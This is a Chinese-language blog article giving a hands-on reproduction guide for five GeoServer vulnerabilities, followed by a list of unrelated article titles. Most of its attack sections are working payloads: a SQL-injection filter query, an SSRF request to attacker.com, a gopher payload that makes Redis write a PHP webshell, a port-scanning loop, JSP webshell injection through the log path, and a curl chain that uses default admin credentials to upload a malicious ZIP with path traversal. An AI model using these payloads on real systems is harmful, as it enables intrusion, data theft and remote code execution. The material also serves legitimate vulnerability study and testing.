当前位置：首页 > article >正文

GeoServer漏洞复现实战：从SQL注入到SSRF的5个关键CVE解析（附环境搭建指南）

article 2026/3/20 19:26:31

GeoServer漏洞复现深度指南从环境搭建到实战利用1. 环境准备与基础配置在开始漏洞复现之前我们需要搭建一个完整的GeoServer测试环境。以下是详细的配置步骤1.1 GeoServer安装与启动首先从官网下载GeoServer 2.22.1版本该版本包含多个历史漏洞wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.1/geoserver-2.22.1-bin.zip unzip geoserver-2.22.1-bin.zip cd geoserver-2.22.1/bin sh startup.sh注意确保系统已安装Java 8或11环境可通过java -version验证1.2 PostGIS环境配置对于需要数据库交互的漏洞如CVE-2023-25157需配置PostgreSQLPostGISdocker pull postgres:14 docker run -e POSTGRES_PASSWORDpassword -p 5432:5432 -d postgres:14 docker exec -it [CONTAINER_ID] /bin/bash apt-get update apt-get install -y postgis postgresql-14-postgis-3 psql -U postgres -c CREATE EXTENSION postgis;1.3 必要扩展安装部分漏洞需要WPS等扩展支持下载WPS插件wget https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.1/extensions/geoserver-2.22.1-wps-plugin.zip将解压后的JAR文件复制到WEB-INF/lib目录重启GeoServer服务2. CVE-2023-25157SQL注入漏洞实战2.1 漏洞原理分析该漏洞存在于OGC Filter的解析过程中影响以下过滤器类型过滤器类型受影响函数PropertyIsLikestrStartsWith/strEndsWithFeatureIdjsonArrayContainsDWithin几何计算函数漏洞核心在于GeoServer未对用户输入的CQL_FILTER参数进行充分过滤导致恶意SQL语句被拼接执行。2.2 完整复现步骤创建测试图层工作区vuln_test数据存储PostGIS连接配置图层名称test_layer添加字符串类型属性name构造恶意请求GET /geoserver/wfs?servicewfsversion1.0.0requestGetFeature typeNamevuln_test:test_layer CQL_FILTERstrStartsWith(name,x)true AND 1(SELECT CAST((SELECT version()) AS integer))-- HTTP/1.1观察响应中的数据库报错信息包含PostgreSQL版本详情2.3 漏洞利用技巧信息收集通过修改SELECT语句可获取数据库用户、表结构等信息数据导出使用COPY TO命令导出敏感数据权限提升利用PostgreSQL大对象函数写入webshell提示实际渗透中需先通过SELECT postgis_version()确认扩展安装情况3. CVE-2023-43795SSRF漏洞深度利用3.1 WPS服务配置验证首先确认WPS扩展已正确安装访问/geoserver/web/管理界面左侧服务列表应显示WPS选项通过Demo WPS Request Builder测试基本功能3.2 SSRF漏洞利用链标准POCPOST /geoserver/wps HTTP/1.1 Host: target:8080 Content-Type: application/xml wps:Execute xmlns:wpshttp://www.opengis.net/wps/1.0.0 ows:IdentifierJTS:area/ows:Identifier wps:DataInputs wps:Input ows:Identifiergeom/ows:Identifier wps:Reference xlink:hrefhttp://attacker.com/ /wps:Input /wps:DataInputs /wps:Execute高级利用方式Redis未授权访问wps:Reference xlink:hrefgopher://redis:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$56%0d%0a%0a%0a%3C%3Fphp%20system($_GET[%27cmd%27])%3B%20%3F%3E%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/www/html%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$9%0d%0ashell.php%0d%0a*1%0d%0a$4%0d%0asave%0d%0a/内网服务探测for port in {1..65535}; do curl -X POST --data poc.xml http://target/geoserver/wps \ --header Content-Type: application/xml \ --proxy http://127.0.0.1:$port done4. CVE-2023-41877从文件读取到RCE的完整链条4.1 漏洞触发条件需要满足两个前提拥有管理员权限账户服务以Tomcat容器部署Jetty不支持JSP解析4.2 分步利用过程修改全局日志路径进入全局设置日志文件位置将路径改为/var/lib/tomcat9/webapps/geoserver/logs/shell.jsp通过错误日志注入JSP代码GET /geoserver/ows?servicewmsversion1.3.0 request%Runtime.getRuntime().exec(request.getParameter(cmd));% HTTP/1.1访问生成的webshellGET /geoserver/logs/shell.jsp?cmdid HTTP/1.14.3 针对Jetty的替代方案当服务使用Jetty时可通过XML部署描述文件实现RCE修改日志路径为/var/lib/jetty/webapps/geoserver/WEB-INF/web.xml注入恶意Servlet配置servlet servlet-nameCommand/servlet-name jsp-file% Runtime.getRuntime().exec(request.getParameter(cmd)) %/jsp-file /servlet5. CVE-2023-51444文件上传漏洞的曲折利用5.1 漏洞前置知识该漏洞涉及ImageMosaic数据源的三个关键特性允许通过REST API管理栅格数据支持ZIP文件自动解压路径校验逻辑存在缺陷5.2 完整复现流程准备恶意ZIP包mkdir -p WEB-INF/classes/ echo % Runtime.getRuntime().exec(request.getParameter(cmd)); % shell.jsp zip -r exploit.zip WEB-INF/ shell.jsp分步执行攻击# 步骤1创建存储 curl -u admin:geoserver -XPOST -H Content-type: text/xml \ -d coverageStorenameexploit/nameworkspacesf/workspace/coverageStore \ http://target/geoserver/rest/workspaces/sf/coveragestores # 步骤2上传ZIP curl -u admin:geoserver -XPUT -H Content-type: application/zip \ --data-binary exploit.zip \ http://target/geoserver/rest/workspaces/sf/coveragestores/exploit/file.imagemosaic # 步骤3路径穿越 curl -u admin:geoserver -XPUT -H Content-type: text/xml \ -d coverageStoreurlfile:/var/lib/tomcat9/webapps/geoserver//url/coverageStore \ http://target/geoserver/rest/workspaces/sf/coveragestores/exploit/external.imagemosaic5.3 实际渗透中的变通方法当标准POC失效时可尝试使用已有合法ImageMosaic的配置文件通过/etc/passwd等文件确定绝对路径结合其他漏洞获取路径信息在测试环境中发现通过修改url参数为file:data/../../webapps/geoserver/也可实现路径穿越

GeoServer漏洞复现实战：从SQL注入到SSRF的5个关键CVE解析（附环境搭建指南）

相关文章：

GeoServer漏洞复现实战：从SQL注入到SSRF的5个关键CVE解析（附环境搭建指南）

PDF-Extract-Kit-1.0实战案例：金融财报PDF自动结构化提取方案

星图AI算力平台：零基础训练PETRV2-BEV模型，5步搞定自动驾驶感知

OpenClaw 超级 AI 实战专栏【补充内容】Token是什么（AI时代的必知概念）

C语言基础项目实战：编写简易客户端调用Ostrakon-VL-8B的REST API

文墨共鸣大模型网络安全知识库构建与威胁情报分析

手把手教你用MetaMask和零知识证明玩转USDT混币器（附完整避坑指南）

REX-UniNLU模型微调实战：领域适配指南

Qwen3.5-9B作品分享：9B模型在LeetCode图像题与Codeforces图表题中的解题表现

动漫转真人AnythingtoRealCharacters2511与Python爬虫实战：自动化采集动漫素材

省下10小时读文献时间！百考通AI自动生成结构完整、引用规范的综述

从零开始：ComfyUI Qwen-Image-Edit-F2P镜像部署与生成实战

从信息过载到学术洞察：百考通AI一键生成可直接用的文献综述初稿

你的选题值得一篇好综述——百考通AI助你站在巨人肩膀上，看清研究方向

AudioLDM-S教育应用：C++编程音效反馈系统

车载DAB认证全流程解析：从ETSI标准到市场准入实战指南

Godot 4 源码解析 - 运行时图片资源动态加载机制

X11转发实战：在XShell中轻松实现远程图形化界面操作

SEER‘S EYE模型在操作系统概念教学中的互动应用

基于LiuJuan20260223Zimage构建企业级知识库与Java面试题系统

卷积神经网络原理详解：结合Phi-3-vision模型理解视觉特征提取

PyTorch池化层实战指南：从MaxPool到AdaptivePool的5种用法详解

PETRV2-BEV模型训练完整指南：从零开始构建BEV感知能力开发环境

为什么93%的嵌入式团队仍不敢用形式化验证？揭秘3个致命认知误区及2024最新轻量级验证工作流

抓紧时间学AI大模型，抓住金三银四机会抢占高薪offer（附转型大模型学习路线）！！！

手把手教你用NVIDIA Jetson AGX Orin运行PointRCNN：OpenPCDet环境搭建全流程

伏羲气象大模型Python入门教程：从零开始调用API

Alpamayo-R1-10B参数详解：Top-p/温度/采样数对轨迹预测的影响分析

Chandra OCR惊艳效果：长小字92.3分识别，发票明细/药品说明书超小字体精准还原

保姆级教程：Stable Diffusion v1.5 Archive 零基础入门，从安装到出图全流程